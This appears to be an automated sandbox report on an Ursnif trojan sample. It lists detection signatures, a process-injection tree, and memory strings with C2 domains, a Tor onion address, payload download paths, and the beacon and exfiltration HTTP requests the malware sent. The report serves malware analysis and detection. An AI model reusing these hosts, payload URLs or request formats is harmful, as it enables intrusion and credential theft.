
Analysis Report 4.bin

Overview

General Information

Sample Name: 4.bin (renamed file extension from bin to exe)
Analysis ID: 293592
MD5: 428e0c87889570c347967a444e6247a5
SHA1: dfa3794f06865a91d1fcfebe9176dddab7d66d38
SHA256: 60924e938260500bea6ca3a3475455bdea8ec70ad6df3358f2f867460061c535

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Found Tor onion address
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for sample
Maps a DLL or memory area into another process
May check the online IP address of the machine
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses nslookup.exe to query domains
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to get notified if a device is plugged in / out
Contains functionality to query CPU information (cpuid)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Rundll32 Activity
Stores large binary data to the registry
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Startup

  • System is w10x64
  • 4.exe (PID: 6740 cmdline: 'C:\Users\user\Desktop\4.exe' MD5: 428E0C87889570C347967A444E6247A5)
    • control.exe (PID: 1632 cmdline: C:\Windows\system32\control.exe /? MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 4628 cmdline: cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\A73F.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 7076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • nslookup.exe (PID: 4012 cmdline: nslookup myip.opendns.com resolver1.opendns.com MD5: AF1787F1DBE0053D74FC687E7233F8CE)
        • cmd.exe (PID: 4840 cmdline: cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\A83F.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • nslookup.exe (PID: 5608 cmdline: nslookup myip.opendns.com resolver1.opendns.com MD5: AF1787F1DBE0053D74FC687E7233F8CE)
        • cmd.exe (PID: 2940 cmdline: cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\A73F.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 7000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 5368 cmdline: cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\A83F.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 7016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 5212 cmdline: 'C:\Windows\syswow64\cmd.exe' /C pause dll mail, , MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 5216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • rundll32.exe (PID: 4540 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL /? MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source: 0000000F.00000002.529092994.0000000003B8E000.00000004.00000001.sdmp, Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Author: Joe Security
Source: 00000025.00000002.437630054.0000000002A2D000.00000004.00000001.sdmp, Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Author: Joe Security
Source: 0000000D.00000002.392030682.00000000005DE000.00000004.00000001.sdmp, Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Author: Joe Security
Source: 00000012.00000002.392099343.00000232E0E6E000.00000004.00000001.sdmp, Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Author: Joe Security
Source: 00000025.00000003.435889269.0000000002650000.00000004.00000001.sdmp, Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Author: Joe Security

Sigma Overview

System Summary:

Sigma detected: Suspicious Rundll32 Activity
Source: Process started
Author: juju4
Data:
  Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL /?
  CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL /?
  CommandLine|base64offset|contains:
  Image: C:\Windows\System32\rundll32.exe
  NewProcessName: C:\Windows\System32\rundll32.exe
  OriginalFileName: C:\Windows\System32\rundll32.exe
  ParentCommandLine: C:\Windows\system32\control.exe /?
  ParentImage: C:\Windows\System32\control.exe
  ParentProcessId: 1632
  ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL /?
  ProcessId: 4540

Signature Overview


AV Detection:

Antivirus / Scanner detection for submitted sample
Source: 4.exe, Avira: detected
Multi AV Scanner detection for domain / URL
Source: adonis-medicine.at, Virustotal: Detection: 8%
Multi AV Scanner detection for submitted file
Source: 4.exe, Virustotal: Detection: 78%
Source: 4.exe, ReversingLabs: Detection: 79%
Machine Learning detection for sample
Source: 4.exe, Joe Sandbox ML: detected
Source: 0.0.4.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.4.exe.60000.0.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.4.exe.400000.1.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Windows\explorer.exe, Code function: 15_2_03B6645C RegisterDeviceNotificationA, 15_2_03B6645C
Source: C:\Users\user\Desktop\4.exe, Code function: 0_2_020A3B4B CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindNextFileA,StrChrA,memcpy,FindNextFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 0_2_020A3B4B
Source: C:\Windows\explorer.exe, Code function: 15_2_03B5B954 FindFirstFileW,DeleteFileW,FindNextFileW, 15_2_03B5B954
Source: C:\Windows\explorer.exe, Code function: 15_2_03B5A684 CreateFileA,FindCloseChangeNotification,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose, 15_2_03B5A684
Source: C:\Windows\explorer.exe, Code function: 15_2_03B53CAC FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose, 15_2_03B53CAC
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 37_2_02A11EB9 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 37_2_02A11EB9
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 37_2_02A0D3BA memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose, 37_2_02A0D3BA

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2021813 ET TROJAN Ursnif Variant CnC Beacon 192.168.2.5:49751 -> 87.106.18.141:80
Source: Traffic, Snort IDS: 2021830 ET TROJAN Ursnif Variant CnC Data Exfil 192.168.2.5:49751 -> 87.106.18.141:80
Found Tor onion address
Source: control.exe, 0000000D.00000003.388861020.000001ED6355C000.00000004.00000040.sdmp, String found in binary or memory: http://h33a7jzovxp2dxfg.onion
Source: control.exe, 0000000D.00000003.388861020.000001ED6355C000.00000004.00000040.sdmp, String found in binary or memory: http://h33a7jzovxp2dxfg.onionhttp://adonis-medicine.at
Source: control.exe, 0000000D.00000002.392030682.00000000005DE000.00000004.00000001.sdmp, String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: explorer.exe, 0000000F.00000002.529092994.0000000003B8E000.00000004.00000001.sdmp, String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: RuntimeBroker.exe, 00000011.00000002.519670891.000002413C902000.00000004.00000001.sdmp, String found in binary or memory: http://h33a7jzovxp2dxfg.onion http://adonis-medicine.at
Source: RuntimeBroker.exe, 00000011.00000002.519670891.000002413C902000.00000004.00000001.sdmp, String found in binary or memory: http://h33a7jzovxp2dxfg.onion http://adonis-medicine.atconstitution.org/usdeclar.txt0x4eb7d2cacom ru org1011totalzaelooop11.club/jd/t32.bin file://c:\test\test32.dll11totalzaelooop11.club/jd/t64.bin file://c:\test\tor64.dllcurlmyip.net12s4Sc9mDb35Ayj8oO1300300300300300101003160
Source: RuntimeBroker.exe, 00000011.00000002.519670891.000002413C902000.00000004.00000001.sdmp, String found in binary or memory: http://h33a7jzovxp2dxfg.onion
Source: RuntimeBroker.exe, 00000011.00000002.519670891.000002413C902000.00000004.00000001.sdmp, String found in binary or memory: http://h33a7jzovxp2dxfg.onionhttp://adonis-medicine.at
Source: RuntimeBroker.exe, 00000011.00000002.520597240.000002413CA4E000.00000004.00000001.sdmp, String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: rundll32.exe, 00000012.00000002.392099343.00000232E0E6E000.00000004.00000001.sdmp, String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: rundll32.exe, 00000012.00000002.393492614.00000232E16FC000.00000004.00000040.sdmp, String found in binary or memory: http://h33a7jzovxp2dxfg.onion http://adonis-medicine.at
Source: rundll32.exe, 00000012.00000002.393492614.00000232E16FC000.00000004.00000040.sdmp, String found in binary or memory: http://h33a7jzovxp2dxfg.onion http://adonis-medicine.atconstitution.org/usdeclar.txt0x4eb7d2cacom ru org1011totalzaelooop11.club/jd/t32.bin file://c:\test\test32.dll11totalzaelooop11.club/jd/t64.bin file://c:\test\tor64.dllcurlmyip.net12s4Sc9mDb35Ayj8oO1300300300300300101003160
Source: rundll32.exe, 00000012.00000002.393492614.00000232E16FC000.00000004.00000040.sdmp, String found in binary or memory: http://h33a7jzovxp2dxfg.onion
Source: rundll32.exe, 00000012.00000002.393492614.00000232E16FC000.00000004.00000040.sdmp, String found in binary or memory: http://h33a7jzovxp2dxfg.onionhttp://adonis-medicine.at
Source: RuntimeBroker.exe, 00000018.00000002.526443465.000001E767702000.00000004.00000001.sdmp, String found in binary or memory: http://h33a7jzovxp2dxfg.onion http://adonis-medicine.at
Source: RuntimeBroker.exe, 00000018.00000002.526443465.000001E767702000.00000004.00000001.sdmp, String found in binary or memory: http://h33a7jzovxp2dxfg.onion http://adonis-medicine.atconstitution.org/usdeclar.txt0x4eb7d2cacom ru org1011totalzaelooop11.club/jd/t32.bin file://c:\test\test32.dll11totalzaelooop11.club/jd/t64.bin file://c:\test\tor64.dllcurlmyip.net12s4Sc9mDb35Ayj8oO1300300300300300101003160
Source: RuntimeBroker.exe, 00000018.00000002.526443465.000001E767702000.00000004.00000001.sdmp, String found in binary or memory: http://h33a7jzovxp2dxfg.onion
Source: RuntimeBroker.exe, 00000018.00000002.526443465.000001E767702000.00000004.00000001.sdmp, String found in binary or memory: http://h33a7jzovxp2dxfg.onionhttp://adonis-medicine.at
Source: RuntimeBroker.exe, 00000018.00000002.526900525.000001E76783E000.00000004.00000001.sdmp, String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: RuntimeBroker.exe, 0000001D.00000002.513862358.00000209ABB02000.00000004.00000001.sdmp, String found in binary or memory: http://h33a7jzovxp2dxfg.onion http://adonis-medicine.at
Source: RuntimeBroker.exe, 0000001D.00000002.513862358.00000209ABB02000.00000004.00000001.sdmp, String found in binary or memory: http://h33a7jzovxp2dxfg.onion http://adonis-medicine.atconstitution.org/usdeclar.txt0x4eb7d2cacom ru org1011totalzaelooop11.club/jd/t32.bin file://c:\test\test32.dll11totalzaelooop11.club/jd/t64.bin file://c:\test\tor64.dllcurlmyip.net12s4Sc9mDb35Ayj8oO1300300300300300101003160
Source: RuntimeBroker.exe, 0000001D.00000002.513862358.00000209ABB02000.00000004.00000001.sdmp, String found in binary or memory: http://h33a7jzovxp2dxfg.onion
Source: RuntimeBroker.exe, 0000001D.00000002.513862358.00000209ABB02000.00000004.00000001.sdmp, String found in binary or memory: http://h33a7jzovxp2dxfg.onionhttp://adonis-medicine.at
Source: RuntimeBroker.exe, 0000001D.00000002.518229914.00000209AC23E000.00000004.00000001.sdmp, String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
May check the online IP address of the machine
Source: unknown, DNS query: name: myip.opendns.com
Source: unknown, DNS query: name: myip.opendns.com
Source: unknown, DNS query: name: myip.opendns.com
Source: unknown, DNS query: name: myip.opendns.com
Uses nslookup.exe to query domains
Source: unknown, Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: unknown, Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: Joe Sandbox View, ASN Name: ONEANDONE-ASBrauerstrasse48DE
Source: global traffic, HTTP traffic detected:
  GET /images/MJnY1AiUvCDG/50GERxkRiSh/jlBF7DudGiB9lb/C7JiMcaZv8z0azvGiFzA1/s_2FA7MRubeEVb1g/eaTQPp5c8aMkRtN/jw16FgWyoqNgUNMa8Y/mf68RWE_2/FN25BA5ahETzE4XJe22R/ZrVip0RGzu9P387g00z/At20l0yyTMfUv800M8hcll/7Y9doTpTO_2FwNXo/aVcKB.gif HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
  Host: adonis-medicine.at
Source: global traffic, HTTP traffic detected:
  POST /images/r9VYgVAUdB/rstcnl7bdkZ3Zejtq/ydgspSv2v_2B/hZUO7aLO9N1/H4RZTOx2UzNBVv/E0RBNqDlEhLUbiikZzyAT/Pz5aNZuiUjHkQmTc/O_2FQaAS6GlxUS3/A5VpVeNDLMFzEKDw4a/k1jdfoCRa/nD4KIKepHQ5ahHWGS2mg/C7IZ5DSBJi5xGvkhYfn/vDkMP_2B5Dj5rDsybOr8GK/e2zZOV6QZ_2BAXPQE/3.bmp HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Content-Type: multipart/form-data; boundary=107585302942641254533219114266
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
  Content-Length: 387
  Host: adonis-medicine.at
Source: global traffic, HTTP traffic detected:
  GET /images/MJnY1AiUvCDG/50GERxkRiSh/jlBF7DudGiB9lb/C7JiMcaZv8z0azvGiFzA1/s_2FA7MRubeEVb1g/eaTQPp5c8aMkRtN/jw16FgWyoqNgUNMa8Y/mf68RWE_2/FN25BA5ahETzE4XJe22R/ZrVip0RGzu9P387g00z/At20l0yyTMfUv800M8hcll/7Y9doTpTO_2FwNXo/aVcKB.gif HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
  Host: adonis-medicine.at
Source: RuntimeBroker.exe, 00000018.00000002.525765320.000001E76746C000.00000004.00000001.sdmp, String found in binary or memory: "Love music? Play your favorite songs and albums free on Windows 10 with Spotify.\r\n\r\nStream the tracks you love instantly, browse the charts or fire up readymade playlists in every genre and mood. Radio plays you great song after great song, based on your music taste. Discover new music too, with awesome playlists built just for you.\r\n\r\nStream Spotify free, with occasional ads, or go Premium.\r\n\r\nFree:\r\n" Play any song, artist, album or playlist instantly\r\n" Browse hundreds of readymade playlists in every genre and mood\r\n" Stay on top of the Charts\r\n" Stream Radio \r\n" Enjoy podcasts, audiobooks and videos\r\n" Discover more music with personalized playlists\r\n \r\nPremium:\r\n" Download tunes and play offline\r\n" Listen ad-free\r\n" Get even better sound quality\r\n" Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify"" equals www.facebook.com (Facebook)
Source: RuntimeBroker.exe, 00000018.00000002.525765320.000001E76746C000.00000004.00000001.sdmp, String found in binary or memory: "Love music? Play your favorite songs and albums free on Windows 10 with Spotify.\r\n\r\nStream the tracks you love instantly, browse the charts or fire up readymade playlists in every genre and mood. Radio plays you great song after great song, based on your music taste. Discover new music too, with awesome playlists built just for you.\r\n\r\nStream Spotify free, with occasional ads, or go Premium.\r\n\r\nFree:\r\n" Play any song, artist, album or playlist instantly\r\n" Browse hundreds of readymade playlists in every genre and mood\r\n" Stay on top of the Charts\r\n" Stream Radio \r\n" Enjoy podcasts, audiobooks and videos\r\n" Discover more music with personalized playlists\r\n \r\nPremium:\r\n" Download tunes and play offline\r\n" Listen ad-free\r\n" Get even better sound quality\r\n" Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify"" equals www.twitter.com (Twitter)
Source: RuntimeBroker.exe, 00000018.00000002.525765320.000001E76746C000.00000004.00000001.sdmp, String found in binary or memory: "Love music? Play your favorite songs and albums free on Windows 10 with Spotify.\r\n\r\nStream the tracks you love instantly, browse the charts or fire up readymade playlists in every genre and mood. Radio plays you great song after great song, based on your music taste. Discover new music too, with awesome playlists built just for you.\r\n\r\nStream Spotify free, with occasional ads, or go Premium.\r\n\r\nFree:\r\n" Play any song, artist, album or playlist instantly\r\n" Browse hundreds of readymade playlists in every genre and mood\r\n" Stay on top of the Charts\r\n" Stream Radio \r\n" Enjoy podcasts, audiobooks and videos\r\n" Discover more music with personalized playlists\r\n \r\nPremium:\r\n" Download tunes and play offline\r\n" Listen ad-free\r\n" Get even better sound quality\r\n" Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify"uired":false}" equals www.facebook.com (Facebook)
Source: RuntimeBroker.exe, 00000018.00000002.525765320.000001E76746C000.00000004.00000001.sdmp, String found in binary or memory: "Love music? Play your favorite songs and albums free on Windows 10 with Spotify.\r\n\r\nStream the tracks you love instantly, browse the charts or fire up readymade playlists in every genre and mood. Radio plays you great song after great song, based on your music taste. Discover new music too, with awesome playlists built just for you.\r\n\r\nStream Spotify free, with occasional ads, or go Premium.\r\n\r\nFree:\r\n" Play any song, artist, album or playlist instantly\r\n" Browse hundreds of readymade playlists in every genre and mood\r\n" Stay on top of the Charts\r\n" Stream Radio \r\n" Enjoy podcasts, audiobooks and videos\r\n" Discover more music with personalized playlists\r\n \r\nPremium:\r\n" Download tunes and play offline\r\n" Listen ad-free\r\n" Get even better sound quality\r\n" Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify"uired":false}" equals www.twitter.com (Twitter)
Source: RuntimeBroker.exe, 00000018.00000002.526088508.000001E767538000.00000004.00000001.sdmp, String found in binary or memory: FIND US: www.facebook.com/HiddenCityGame equals www.facebook.com (Facebook)
Source: RuntimeBroker.exe, 00000018.00000002.526088508.000001E767538000.00000004.00000001.sdmp, String found in binary or memory: FOLLOW US: www.twitter.com/g5games equals www.twitter.com (Twitter)
Source: RuntimeBroker.exe, 00000018.00000002.526157992.000001E7675B6000.00000004.00000001.sdmp, String found in binary or memory: Like us on Facebook: http://www.facebook.com/spotify equals www.facebook.com (Facebook)
Source: RuntimeBroker.exe, 00000018.00000002.526088508.000001E767538000.00000004.00000001.sdmp, String found in binary or memory: WATCH US: www.youtube.com/g5enter equals www.youtube.com (Youtube)
Source: RuntimeBroker.exe, 00000018.00000002.526088508.000001E767538000.00000004.00000001.sdmp, String found in binary or memory: rivacy Policy: https://www.facebook.com/about/privacy/ equals www.facebook.com (Facebook)
Source: unknown, DNS traffic detected: queries for: 11totalzaelooop11.club
Source: unknown, HTTP traffic detected:
  POST /images/r9VYgVAUdB/rstcnl7bdkZ3Zejtq/ydgspSv2v_2B/hZUO7aLO9N1/H4RZTOx2UzNBVv/E0RBNqDlEhLUbiikZzyAT/Pz5aNZuiUjHkQmTc/O_2FQaAS6GlxUS3/A5VpVeNDLMFzEKDw4a/k1jdfoCRa/nD4KIKepHQ5ahHWGS2mg/C7IZ5DSBJi5xGvkhYfn/vDkMP_2B5Dj5rDsybOr8GK/e2zZOV6QZ_2BAXPQE/3.bmp HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Content-Type: multipart/form-data; boundary=107585302942641254533219114266
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
  Content-Length: 387
  Host: adonis-medicine.at
Source: RuntimeBroker.exe, 0000001D.00000002.513862358.00000209ABB02000.00000004.00000001.sdmp, String found in binary or memory: http://adonis-medicine.at
Source: explorer.exe, 0000000F.00000002.541052132.00000000053C4000.00000004.00000001.sdmp, String found in binary or memory: http://adonis-medicine.at/images/r9VYgVAUdB/rstcnl7bdkZ3Zejtq/ydgspSv2v_2B/hZUO7aLO9N1/H4RZTOx2UzNBV
Source: RuntimeBroker.exe, 00000011.00000002.519670891.000002413C902000.00000004.00000001.sdmp, rundll32.exe, 00000012.00000002.393492614.00000232E16FC000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000018.00000002.526443465.000001E767702000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001D.00000002.513862358.00000209ABB02000.00000004.00000001.sdmp, String found in binary or memory: http://adonis-medicine.atconstitution.org/usdeclar.txt0x4eb7d2cacom
Source: control.exe, 0000000D.00000002.392030682.00000000005DE000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.529092994.0000000003B8E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000011.00000002.520597240.000002413CA4E000.00000004.00000001.sdmp, rundll32.exe, 00000012.00000002.392099343.00000232E0E6E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000018.00000002.526900525.000001E76783E000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001D.00000002.518229914.00000209AC23E000.00000004.00000001.sdmp, String found in binary or memory: http://constitution.org/usdeclar.txt
Source: control.exe, 0000000D.00000002.392030682.00000000005DE000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.529092994.0000000003B8E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000011.00000002.520597240.000002413CA4E000.00000004.00000001.sdmp, rundll32.exe, 00000012.00000002.392099343.00000232E0E6E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000018.00000002.526900525.000001E76783E000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001D.00000002.518229914.00000209AC23E000.00000004.00000001.sdmp, String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://fontfabrik.com
Source: RuntimeBroker.exe, 0000001D.00000002.513862358.00000209ABB02000.00000004.00000001.sdmp, String found in binary or memory: http://h33a7jzovxp2dxfg.onion
Source: control.exe, 0000000D.00000003.388861020.000001ED6355C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000011.00000002.519670891.000002413C902000.00000004.00000001.sdmp, rundll32.exe, 00000012.00000002.393492614.00000232E16FC000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000018.00000002.526443465.000001E767702000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001D.00000002.513862358.00000209ABB02000.00000004.00000001.sdmp, String found in binary or memory: http://h33a7jzovxp2dxfg.onionhttp://adonis-medicine.at
Source: control.exe, 0000000D.00000002.392030682.00000000005DE000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.529092994.0000000003B8E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000011.00000002.520597240.000002413CA4E000.00000004.00000001.sdmp, rundll32.exe, 00000012.00000002.392099343.00000232E0E6E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000018.00000002.526900525.000001E76783E000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001D.00000002.518229914.00000209AC23E000.00000004.00000001.sdmp, String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: RuntimeBroker.exe, 00000018.00000002.526088508.000001E767538000.00000004.00000001.sdmp, String found in binary or memory: http://messenger.comIL
Source: RuntimeBroker.exe, 00000018.00000000.394678298.000001E764D02000.00000004.00000001.sdmp, String found in binary or memory: http://ns.adobe.cmgS
Source: RuntimeBroker.exe, 00000018.00000000.394678298.000001E764D02000.00000004.00000001.sdmp, String found in binary or memory: http://ns.adobe.ux
